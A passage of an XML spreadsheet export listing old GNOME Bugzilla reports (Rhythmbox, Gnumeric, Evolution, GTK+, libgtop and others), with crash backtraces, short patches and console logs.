    <t>GTRANSLATOR-517913</t>
  </si>
  <si>
    <t>Loading files from console</t>
  </si>
  <si>
    <t>In the next comment i'll attach the patch.
This patch adds support for this using GIO. And GIO is unstable we can't apply it until glib release.</t>
  </si>
  <si>
    <t>RHYTHMBOX-147971</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 1 (Yarrow)
Package: rhythmbox
Severity: normal
Version: GNOME2.4.0 unspecified
Gnome-Distributor: GNOME.Org
Synopsis: Crashes on startup
Bugzilla-Product: rhythmbox
Bugzilla-Component: General
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
Steps to reproduce the crash:
1. Choose Rhythmbox from Gnome Menu
2. 
3. 
Expected Results:
How often does this happen?
Crashes every time
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/rhythmbox'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(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Thread debugging using libthread_db
enabled]
[New Thread -1084505984 (LWP 6031)]
[New Thread 47721392 (LWP 6035)]
[New Thread 104623024 (LWP 6034)]
[New Thread 37231536 (LWP 6033)]
[New Thread 26741680 (LWP 6032)]
(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0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#0  0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x00137b2b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0x00a4b7f4 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#3  
#4  0x00c14f48 in strcmp () from /lib/tls/libc.so.6
#5  0x080667ae in rb_shell_player_set_shuffle ()
#6  0x00414547 in g_object_get_valist () from
/usr/lib/libgobject-2.0.so.0
#7  0x00414893 in g_object_get () from /usr/lib/libgobject-2.0.so.0
#8  0x0806c080 in rb_statusbar_sync_state ()
#9  0x0806b8d5 in rb_statusbar_get_type ()
#10 0x00413d89 in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
#11 0x0806b07c in rb_statusbar_get_type ()
#12 0x0041345e in g_object_newv () from /usr/lib/libgobject-2.0.so.0
#13 0x00413a72 in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
#14 0x00413226 in g_object_new () from /usr/lib/libgobject-2.0.so.0
#15 0x0806bf69 in rb_statusbar_new ()
#16 0x080625fb in rb_shell_construct ()
#17 0x0805ff85 in main ()
Thread 5 (Thread 26741680 (LWP 6032)):
#0  0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00134424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0037da2a in g_async_queue_push_unlocked () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x0037dbb9 in g_async_queue_pop_unlocked () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x003aacdb in g_static_rw_lock_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x003a98f1 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x001317fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x00c7aaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread 37231536 (LWP 6033)):
#0  0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x001345e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x005438a8 in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0x09dc2878 in ?? ()
No symbol table info available.
#4  0x09dc2858 in ?? ()
No symbol table info available.
#5  0x02381998 in ?? ()
No symbol table info available.
#6  0x0039de81 in g_queue_peek_tail () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x0037d971 in g_async_queue_push_unlocked () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x0037ddaf in g_async_queue_timed_pop () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x0809f03b in rhythmdb_add_song ()
No symbol table info available.
#10 0x0809f0f6 in rhythmdb_add_song ()
No symbol table info available.
#11 0x003a98f1 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x001317fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#13 0x00c7aaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 104623024 (LWP 6034)):
#0  0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x001345e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x005438a8 in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0x09dc2808 in ?? ()
No symbol table info available.
#4  0x09dc27e8 in ?? ()
No symbol table info available.
#5  0x063c6998 in ?? ()
No symbol table info available.
#6  0x0039de81 in g_queue_peek_tail () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x0037d971 in g_async_queue_push_unlocked () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x0037ddaf in g_async_queue_timed_pop () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x0809f03b in rhythmdb_add_song ()
No symbol table info available.
#10 0x0809f406 in rhythmdb_add_song ()
No symbol table info available.
#11 0x003a98f1 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x001317fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#13 0x00c7aaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread 47721392 (LWP 6035)):
#0  0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x001345e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x005438a8 in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0x09dc28e8 in ?? ()
No symbol table info available.
#4  0x09dc28c8 in ?? ()
No symbol table info available.
#5  0x02d829a8 in ?? ()
No symbol table info available.
#6  0x0039de81 in g_queue_peek_tail () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x0037d971 in g_async_queue_push_unlocked () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x0037ddaf in g_async_queue_timed_pop () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x0809f03b in rhythmdb_add_song ()
No symbol table info available.
#10 0x0809f50b in rhythmdb_add_song ()
No symbol table info available.
#11 0x003a98f1 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x001317fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#13 0x00c7aaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1084505984 (LWP 6031)):
#0  0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00137b2b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00a4b7f4 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x00c14f48 in strcmp () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x080667ae in rb_shell_player_set_shuffle ()
No symbol table info available.
#6  0x00414547 in g_object_get_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0x00414893 in g_object_get () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x0806c080 in rb_statusbar_sync_state ()
No symbol table info available.
#9  0x0806b8d5 in rb_statusbar_get_type ()
No symbol table info available.
#10 0x00413d89 in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x0806b07c in rb_statusbar_get_type ()
No symbol table info available.
#12 0x0041345e in g_object_newv () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x00413a72 in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x00413226 in g_object_new () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x0806bf69 in rb_statusbar_new ()
No symbol table info available.
#16 0x080625fb in rb_shell_construct ()
No symbol table info available.
#17 0x0805ff85 in main ()
No symbol table info available.
#0  0x00457c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-07-20 06:28 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product rhythmbox.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was kheine7@hotmail.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>kheine7</t>
  </si>
  <si>
    <t>GPERFMETER-101560</t>
  </si>
  <si>
    <t>A resource name disk  should not be localized</t>
  </si>
  <si>
    <t>looks like my type when I put a fix for bug 96203.
A patch below will be commit.
RCS file: /cvs/gnome/gperfmeter/src/resources.cv
retrieving revision 1.16
diff -u -p -r1.16 resources.c
--- resources.c	4 Dec 2002 11:07:00 -0000	1.16
+++ resources.c	18 Dec 2002 23:03:08 -0000
@@ -4407 +4407 @@ InitResources()
     /* disk */
     PM-&gt;Meters[PM_DISK].Type = PM_DISK
-    PM-&gt;Meters[PM_DISK].Name = _(disk)
+    PM-&gt;Meters[PM_DISK].Name = N_(disk)
     PM-&gt;Meters[PM_DISK].TRName = PmStringCreateLocalized(_(disk))
     PM-&gt;Meters[PM_DISK].RName = disk
     PM-&gt;Meters[PM_DISK].MinMax = 40</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-447357</t>
  </si>
  <si>
    <t>The changed shortcut for hint is not updated in help</t>
  </si>
  <si>
    <t>The shortcut change in bug #420325 was not updated in the help file.
The old shortcut was control+i the new is control+h.</t>
  </si>
  <si>
    <t>kingudk</t>
  </si>
  <si>
    <t>GNOME-UTILS-61531</t>
  </si>
  <si>
    <t>Some applications are not relevant to GNOME core</t>
  </si>
  <si>
    <t>Some applications are not relevant to GNOME core and should be
removed for 2.0. those applications are:
Color Browser 
Font Selector
Text File Viewer
see http://www242.pair.com/nilsp/nils/panel/menus_old.html for
further details
This enhancement/bug is the result of the gnome  must fix for 2.0 
usablity project: http://developer.gnome.org/projects/gup/proposals/</t>
  </si>
  <si>
    <t>n.p</t>
  </si>
  <si>
    <t>GOSSIP-306321</t>
  </si>
  <si>
    <t>Duplicate username error when registering is unclear</t>
  </si>
  <si>
    <t>Version details: CVS 2 June 2005
Distribution/Version: SUSE 9.3
I tried registering a new account through the initial setup druid and every
username server and password combination I tried failed with Reason: Not
Acceptable.
This was using CVS on 2 June 2005.</t>
  </si>
  <si>
    <t>GNUMERIC-164779</t>
  </si>
  <si>
    <t>CRITICALs</t>
  </si>
  <si>
    <t>Create graph and at the point where you are supposed to place the graph
in the sheet press Ctrl-up instead.
(gnumeric:15546): GLib-CRITICAL **: file ghash.c: line 554
(g_hash_table_foreach): assertion `hash_table != NULL' failed
(gnumeric:15546): GLib-CRITICAL **: file ghash.c: line 554
(g_hash_table_foreach): assertion `hash_table != NULL' failed
** (gnumeric:15546): CRITICAL **: file commands.c: line 4546 (cmd_objects_move):
assertion `NULL != objects' failed
(Gnumeric 1.4.1)</t>
  </si>
  <si>
    <t>EVOLUTION-216018</t>
  </si>
  <si>
    <t>Incorrectly questions to send HTML formatted mail</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
It asks are you sure you want to send html mail to the following? when
foo prefers to receive html mail is checked in contacts
Steps to reproduce the problem:
1. Send a html mail to a non-html marked receiver
2. Accept to send html foramtted mail
3. Send a html mail to a html marked receiver
Actual Results:
Questions you do you want to send html mail to the following?
Expected Results:
No question. The person I'm sending it to is marked to receive html mail
How often does this happen? 
about 50%-60% of the time
Additional Information:</t>
  </si>
  <si>
    <t>davyd</t>
  </si>
  <si>
    <t>GTKSOURCEVIEW-168246</t>
  </si>
  <si>
    <t>micro cleanup</t>
  </si>
  <si>
    <t>a small code cleanup that I stumbled in while answering a question on irc...
(it doesn't really matter in practice but it avoids getting the buffer from the
view twice... resulting code is nicer though)</t>
  </si>
  <si>
    <t>GDESKLETS-406957</t>
  </si>
  <si>
    <t>gtop.c cannot get number of cpu correctly</t>
  </si>
  <si>
    <t>Please describe the problem:
On Sparc box (Big Endian) trace into the gtop.c  glibtop_global_server-&gt;ncpu is not always correct it return random number in sparc.
Steps to reproduce:
1. Start gdesklets in Sparc
2. Start Sidecandy CPU
3. 
Actual results:
The sidecandy CPU cannot be launch because the number of CPU is incorrect
Expected results:
The correct number of CPUs
Does this happen every time?
Yes
Other information:
This is related to Endianness issue</t>
  </si>
  <si>
    <t>NETWORKMANAGER-313920</t>
  </si>
  <si>
    <t>Translatable string needs context</t>
  </si>
  <si>
    <t>#: gnome/applet/applet.c:592                                                                                                                                           
# c-format                                                                                                                                                            
msgid                                                                                                                                                                
%s\n                                                                                                                    
\n                                                                                                                                                                   
%s\n                                                                                                                                                                 
\n                                                                                                                                                                   
\%s\
What are translators supposed to do with this string? If you feel that it should be translatable please 
consider adding some hints as to what each %s refers to.</t>
  </si>
  <si>
    <t>AT-SPI-125834</t>
  </si>
  <si>
    <t>Application object fails Accessible_isApplication</t>
  </si>
  <si>
    <t>Consider the mixer applet. This is registered as an application only when a
toplevel window is displayed.
In an AT e.g. gnopernicus or at-poke if Accessible_isApplication is called
on the the Accessible it returns FALSE.
Calling Accessible_isApplication for a normal application e.g. gedit
returns TRUE.</t>
  </si>
  <si>
    <t>GNUMERIC-517591</t>
  </si>
  <si>
    <t>Null pointer crash in lotus_rldb_data()</t>
  </si>
  <si>
    <t>Version: r16388
OS: Ubuntu Gutsy
The upcoming sample is a fuzzed version of poker.wb2.  It looks like the Lotus importer is handling the file which may be a bug in and of itself.
Steps to reproduce:
- Load the upcoming attachment in Gnumeric to trigger a crash
Backtrace:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1232128336 (LWP 15019)]
0xb6539275 in lotus_rldb_data (rldb=0x0 p=0xb66a2ac2 l=1) at lotus.c:1071
1071            g_return_if_fail (rldb-&gt;pending_id == 0)
(gdb) p rldb
$1 = (LotusRLDB *) 0x0
(gdb) bt
#0  0xb6539275 in lotus_rldb_data (rldb=0x0 p=0xb66a2ac2 l=1) at lotus.c:1071
#1  0xb653c9b5 in lotus_read_new (state=0xbf9a3ee4 r=0xbf9a3eb8) at lotus.c:2179
#2  0xb653ce15 in lotus_read (state=0xbf9a3ee4) at lotus.c:2334
#3  0xb653832c in lotus_file_open (fo=0x8269260 io_context=0x8270860 wb_view=0x82b5470 
    input=0x80fe390) at boot.c:83
#4  0xb792b446 in go_plugin_loader_module_func_file_open (fo=0x8269260 service=0x8295038 
    io_context=0x8270860 FIXME_FIXME_workbook_view=0x82b5470 input=0x80fe390)
    at go-plugin-loader-module.c:239
#5  0xb792cec8 in go_plugin_file_opener_open (fo=0x8269260 unused_enc=0x0 io_context=0x8270860 
    FIXME_FIXME_workbook_view=0x82b5470 input=0x80fe390) at go-plugin-service.c:476
#6  0xb792f818 in go_file_opener_open (fo=0x8269260 opt_enc=0x0 io_context=0x8270860 
    FIXME_workbook_view=0x82b5470 input=0x80fe390) at file.c:294
#7  0xb7c99013 in wb_view_new_from_input (input=0x80fe390 optional_fmt=0x8269260 
    io_context=0x8270860 optional_enc=0x0) at workbook-view.c:1212
#8  0xb7c991be in wb_view_new_from_uri (uri=0x8295c60 file:///home/s/Desktop/5-poker.wb2 
    optional_fmt=0x0 io_context=0x8270860 optional_enc=0x0) at workbook-view.c:1264
#9  0x0804c21b in main (argc=2 argv=0xbf9a4154) at main-application.c:417</t>
  </si>
  <si>
    <t>ANJUTA-528685</t>
  </si>
  <si>
    <t>Anjuta startup is really slow</t>
  </si>
  <si>
    <t>Anjuta 2.4 (in Ubuntu Hardy beta or built from svn) takes ages to startup for me. The splash screen seems to stick after saying Creating project view... or similar (the screen doesn't redraw so I can't see it now). 
This is making it difficult to create a habit of using Anjuta because I always start using something else while I'm waiting.
I see this on the terminal:
murrayc@murrayc-desktop:~/svn/gnome220/gtksourceview$ anjuta&amp;
[1] 25797
murrayc@murrayc-desktop:~/svn/gnome220/gtksourceview$ Gtk-Message: Failed to load module atk-bridge: libatk-bridge.so: cannot open shared object file: No such file or directory
(anjuta:25797): Gnome-WARNING **: Accessibility: failed to find module 'libgail-gnome' which is needed to make this application accessible
(anjuta:25797): Gnome-WARNING **: Accessibility: failed to find module 'libatk-bridge' which is needed to make this application accessible
** Message: Spawning script
Installing parsers: Asm Asp Awk BETA C C++ C# Fortran Java Lisp Lua Make Pascal Perl PHP Python Ruby Scheme Sh SML SQL Tcl Vera Verilog Vim
    Asm: 
    Asp: 
    Awk: 
    BETA: 
    C: 
    C++: 
    C#: 
    Fortran: 
    Java: 
    Lisp: 
    Lua: 
    Make: 
    Pascal: 
    Perl: 
    PHP: 
    Python: 
    Ruby: 
    Scheme: 
    Sh: 
    SML: 
    SQL: 
    Tcl: 
    Vera: 
    Verilog: 
    Vim: 
OPENING /home/murrayc/svn/gnome220/glom/glom/mode_data/flowtablewithfields.cc as C++ language file
OPENING /home/murrayc/svn/gnome220/glom/glom/mode_data/flowtablewithfields.h as C++ language file
It prints nothing more on the terminal for about 2 minutes then it prints this and finishes starting up:
OPENING /home/murrayc/svn/gnome220/glom/glom/application.h as C++ language file
OPENING /home/murrayc/svn/gnome220/glom/glom/utility_widgets/db_adddel/glom_db_treemodel.h as C++ language file
OPENING /home/murrayc/svn/gnome220/glom/glom/utility_widgets/db_adddel/glom_db_treemodel.cc as C++ language file</t>
  </si>
  <si>
    <t>LIBGTOP-518145</t>
  </si>
  <si>
    <t>Uncorrect parsing of smaps with linux kernels &gt;= 2.6.25</t>
  </si>
  <si>
    <t>Please describe the problem:
In the Linux kernel 2.6.25 an additional field has been added to the smaps proc file: Pss. This leads to add_smaps() in sysdeps/linux/procmap.c to fail parsing the entry: it generates error messages like Could not read smaps value Shared_Clean: .
Here is an example of entry in /proc/self/smaps:
2ac8df322000-2ac8df406000 r--p 00000000 03:05 334328                     /usr/share/locale/UTF-8/LC_COLLATE
Size:                912 kB
Rss:                  12 kB
Pss:                   0 kB
Shared_Clean:         12 kB
Shared_Dirty:          0 kB
Private_Clean:         0 kB
Private_Dirty:         0 kB
Referenced:           12 kB
Steps to reproduce:
1. gnome-system-monitor
(do it in the console for more fun) 
Actual results:
Lots and lots of messages like Could not read smaps value Shared_Clean:: Success are displayed on the console. The Memory field in g-s-m has huge values (something like 4GB on x86 even quite a lot more on x86_64).  
Expected results:
No error message. The correct amount of memory is displayed in g-s-m (in the order of 100MB)
Does this happen every time?
Always with a Linux kernel 2.6.25-rc2
Other information:
Probably the best way to solve it would be to have a more clever parser in add_smaps() which just skip field (that is lines which starts with no whitespace and then a colon) which are unknown.
For more info on PSS: see commit ec4dd3eb35759f9fbeb5c1abb01403b2fde64cc9 . BTW it is specifically made to represent the memory usage of a task so it might be worth reading it :-)</t>
  </si>
  <si>
    <t>DIA-52857</t>
  </si>
  <si>
    <t>'error parsing point' whilst loading</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  dia
Severity: grave
Version:  0.86
Synopsis: 'error parsing point' whilst loading 
Class:    sw-bug
Distribution: Debian 2.2
System: Linux 2.2.18pre21-compact i686 unknown
C library: C library 2.1.3-17
C compiler: 2.95.2
glib: glib 1.2.8-helix1
GTK+: GTK+ 1.2.8-helix2
ORBit: ORBit 0.5.6-0potato1
libxml: libxml 1.8.10-helix1
gnome-print: gnome-print 
gnome-core: gnome-core 1.2.4-helix2
Description:
dia seems to have problems with loading lines.
When loading a diagram with lines the diagram is broken (the lines are
missing)
and numerous windows with the message 'error parsing point' pop up when
the diagram is loaded.
The error does not appear (hold your breath) when you toggle the
setting
that tells the application to compress the diagram when saving it!
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-04-04 08:03 -------
The original reporter (goldbach@tucco.de) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component james@daa.com.au.
</t>
  </si>
  <si>
    <t>goldbach</t>
  </si>
  <si>
    <t>GTK+-75687</t>
  </si>
  <si>
    <t>GtkCellRendererText GtkENtry does not line up with cell</t>
  </si>
  <si>
    <t>Start testgtkedit
selec Multiline Fun
check the checkmark in the 4th row (And then a fourth string....)
the fourth row is now also selected.
Resize the window such that just half (heightwise) of the fourth row is
visible.
Click once on what is visble or the `f' of `fourth row'. THe GtkEntry
appears and is offset downwards.
Bug Bug Bug!!!!</t>
  </si>
  <si>
    <t>GNOME-PANEL-401481</t>
  </si>
  <si>
    <t>Kill gnome panel makes floating notification area</t>
  </si>
  <si>
    <t>Please describe the problem:
Running killall gnome-panel (or otherwise abruptly closing the panel) while icons are in the notification area makes for floating icons of anything in the notification area.  Even after gnome-panel restart those icons (e.g. from gnome-power-manager status) will remain floating although NEW notification icons will behave correctly.
Steps to reproduce:
1. Put something in the notification area
2. killall gnome-panel
3. 
Actual results:
Floating notification icons (usually upper left of screen)
Expected results:
No floating icons
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>terrywatt</t>
  </si>
  <si>
    <t>EVOLUTION-215793</t>
  </si>
  <si>
    <t>esc key on filter edit dialog leaves filter list greyed out</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.2
Synopsis: esc key on filter edit dialog leaves filter list greyed out
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
When I open the Filter dialog and edit or add a new filter then press
esc the Filter dialog remains greyed out. After doing this a few times
I had to switch to a text console and kill evolution.
Unknown reporter: justin@marimba.caltech.edu changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>RHYTHMBOX-116901</t>
  </si>
  <si>
    <t>Adding large dir of songs takes a long time.</t>
  </si>
  <si>
    <t>Instead of adding each song to the treeview as it comes in (and possibly
causing a sort) batch them or show a progress bar and add them all at once.
 Now if i add a collection of 5 or 6 hundred songs it takes a couple of
minutes for it to load.  This is particularly annoying since rb seems to
forget additions to the lib that come from my usbdrive if it is ever unpluged.</t>
  </si>
  <si>
    <t>govindsalinas</t>
  </si>
  <si>
    <t>LIBGNOMEDB-81683</t>
  </si>
  <si>
    <t>gnome_db_config_ functions</t>
  </si>
  <si>
    <t>Due to the removal of GConf in libgda we've got now all gnome-db using the
~/.libgda/config file for configuration where they should be using GConf.
So what must be done is to get the gda-config.c file from the GNOME 1.x
version and add the generic functions (gda_config_get_int etc) as
gnome_db_config_* in gnome-db-config.c in libgnomedb.
Also we must replace all gda_config_* usage with those new functions all
over libgnomedb and gnome.db</t>
  </si>
  <si>
    <t>GTK+-464524</t>
  </si>
  <si>
    <t>Mention non-intersecting case in gdk_rectangle_intersect</t>
  </si>
  <si>
    <t>gdk_rectangle_intersect() should mention what happens when the rectangles doesn't intersect.</t>
  </si>
  <si>
    <t>GTK+-93994</t>
  </si>
  <si>
    <t>gtk_menu_item_set_accel_path() documentation addition</t>
  </si>
  <si>
    <t>I propose the following addition at the end of the
gtk_menu_item_set_accel_path() documentation comment (following This
function is basically ...):
Note that you do need to set an accelerator on the parent menu with
gtk_menu_set_accel_group() for this to work.
Or something along these lines. gtk_menu_set_accel_group() just isn't
referenced anywhere now and it doesn't work without it.</t>
  </si>
  <si>
    <t>filipvr</t>
  </si>
  <si>
    <t>EVOLUTION-223602</t>
  </si>
  <si>
    <t>crash while checking mail</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.3
Synopsis: crash while checking mail
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Just after starting up evolution I clicked the Send/Receive button.  My
mail started downloading
as usual but then the evolution-mail component crashed and burned.
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 29357)]
[New Thread 2049 (LWP 29380)]
[New Thread 1026 (LWP 29381)]
[New Thread 2051 (LWP 29382)]
[New Thread 3076 (LWP 29385)]
[New Thread 4101 (LWP 29386)]
0x40f6be29 in __wait4 () from /lib/libc.so.6
#0  0x40f6be29 in __wait4 () from /lib/libc.so.6
#1  0x40fe8050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40ead8de in waitpid (pid=29388 stat_loc=0xbffff48c options=0)
    at wrapsyscall.c:172
#3  0x4091e7ae in gnome_segv_handle (signum=8) at gnome-init.c:664
#4  0x0809d5ed in message_browser_get_type ()
#5  0x40eab4c7 in pthread_sighandler (signo=8 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136558144 esi = 12 ebp = 3221223512 esp = 3221223500 ebx = 136558240 edx = 6 ecx = 12 eax = 4294967292 trapno = 0 err = 0 eip = 1090088044 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223500 ss = 43 __ssh = 0 fpstate = 0xbffff5d0 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40f96c6c in __poll (fds=0x823b640 nfds=12 timeout=49)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40e8fa74 in g_main_poll (timeout=49 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40e8f465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x40e8f7e8 in g_main_run (loop=0x80feda0) at gmain.c:935
#11 0x40bef27b in gtk_main () at gtkmain.c:524
#12 0x403de53b in bonobo_main () at bonobo-main.c:284
#13 0x0809d81d in main ()
#14 0x40ed4306 in __libc_start_main (main=0x809d638  argc=3 
    ubp_av=0xbffffaf4 init=0x8066214  fini=0x80d3630  
    rtld_fini=0x4000d2dc  stack_end=0xbffffaec)
    at ../sysdeps/generic/libc-start.c:129
Thread 6 (Thread 4101 (LWP 29386)):
#0  0x40ee6966 in __sigsuspend (set=0xbf1ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40eaad61 in __pthread_wait_for_restart_signal (self=0xbf1ffc00)
    at pthread.c:969
#2  0x40ea6ee4 in pthread_cond_wait (cond=0x8130930 mutex=0x8130910)
    at restart.h:34
#3  0x400824ce in e_msgport_wait (mp=0x81308e8) at e-msgport.c:198
#4  0x40082af6 in thread_dispatch (din=0x8130898) at e-msgport.c:517
#5  0x40ea7f87 in pthread_start_thread (arg=0xbf1ffc00) at manager.c:284
Thread 5 (Thread 3076 (LWP 29385)):
#0  0x40ee6966 in __sigsuspend (set=0xbf3ff140)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40eaad61 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x40eacaa3 in __pthread_alt_lock (lock=0x80e7300 self=0x0) at restart.h:34
#3  0x40ea8fb6 in __pthread_mutex_lock (mutex=0x80e72f0) at mutex.c:120
#4  0x0809d630 in message_browser_get_type ()
#5  0x40eab4c7 in pthread_sighandler (signo=8 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 9472 esi = 137052248 ebp = 3208640004 esp = 3208639964 ebx = 137064032 edx = 0 ecx = 3208639934 eax = 1793 trapno = 0 err = 0 eip = 135022374 cs = 35 __csh = 0 eflags = 2163270 esp_at_signal = 3208639964 ss = 43 __ssh = 0 fpstate = 0xbf3ff360 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x080c4726 in word_index_mem_dump_info ()
#8  0x080c386b in ibex_create_word_index_mem ()
#9  0x080c2c46 in ibex_unindex ()
#10 0x40048699 in camel_folder_summary_info_new_from_message (s=0x8154ce0 
    msg=0x8230e58) at camel-folder-summary.c:910
#11 0x40048460 in camel_folder_summary_add_from_message (s=0x8154ce0 
    msg=0x8230e58) at camel-folder-summary.c:805
#12 0x4111e17b in local_summary_add (cls=0x8154ce0 msg=0x8230e58 
    info=0x8232ee8 ci=0x8280978 ex=0x8250730) at camel-local-summary.c:385
#13 0x4111df44 in camel_local_summary_add (cls=0x8154ce0 msg=0x8230e58 
    info=0x8232ee8 ci=0x8280978 ex=0x8250730) at camel-local-summary.c:291
#14 0x41120090 in mbox_append_message (folder=0x81541c8 message=0x8230e58 
    info=0x8232ee8 ex=0x8250730) at camel-mbox-folder.c:200
#15 0x4004cc15 in camel_folder_append_message (folder=0x81541c8 
    message=0x8230e58 info=0x8232ee8 ex=0x8250730) at camel-folder.c:500
#16 0x0808ff4f in mail_importer_uninit ()
#17 0x4004cc15 in camel_folder_append_message (folder=0x8155774 
    message=0x8230e58 info=0x8232ee8 ex=0x8250730) at camel-folder.c:500
#18 0x40044059 in do_move (f=0x823f650 argc=1 argv=0xbf3ff8ec 
    driver=0x823e3c8) at camel-filter-driver.c:428
#19 0x4008524c in e_sexp_term_eval (f=0x823f650 t=0x82b56c0) at e-sexp.c:642
#20 0x400850a5 in term_eval_begin (f=0x823f650 argc=1 argv=0x82421e0 
    data=0x400951c0) at e-sexp.c:586
#21 0x400851f4 in e_sexp_term_eval (f=0x823f650 t=0x82b55d0) at e-sexp.c:632
#22 0x4008603b in e_sexp_eval (f=0x823f650) at e-sexp.c:1214
#23 0x40044f8b in camel_filter_driver_filter_message (driver=0x823e3c8 
    message=0x8230e58 info=0x8232ee8 
    uid=0x824d6a0 e586a5b8e339ebc5a22a63a7c46973c9 source=0x824b748 
